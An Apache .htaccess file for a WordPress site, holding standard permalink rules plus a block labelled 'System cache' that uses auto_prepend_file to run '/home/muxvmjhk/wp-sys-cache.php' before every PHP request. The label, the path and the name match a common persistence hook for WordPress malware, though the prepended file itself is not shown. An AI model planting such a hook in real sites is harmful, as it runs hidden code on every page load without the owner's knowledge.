# System cache
<IfModule mod_php5.c>
  php_value auto_prepend_file "/home/muxvmjhk/wp-sys-cache.php"
</IfModule>
<IfModule mod_php7.c>
  php_value auto_prepend_file "/home/muxvmjhk/wp-sys-cache.php"
</IfModule>
<IfModule mod_php8.c>
  php_value auto_prepend_file "/home/muxvmjhk/wp-sys-cache.php"
</IfModule>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>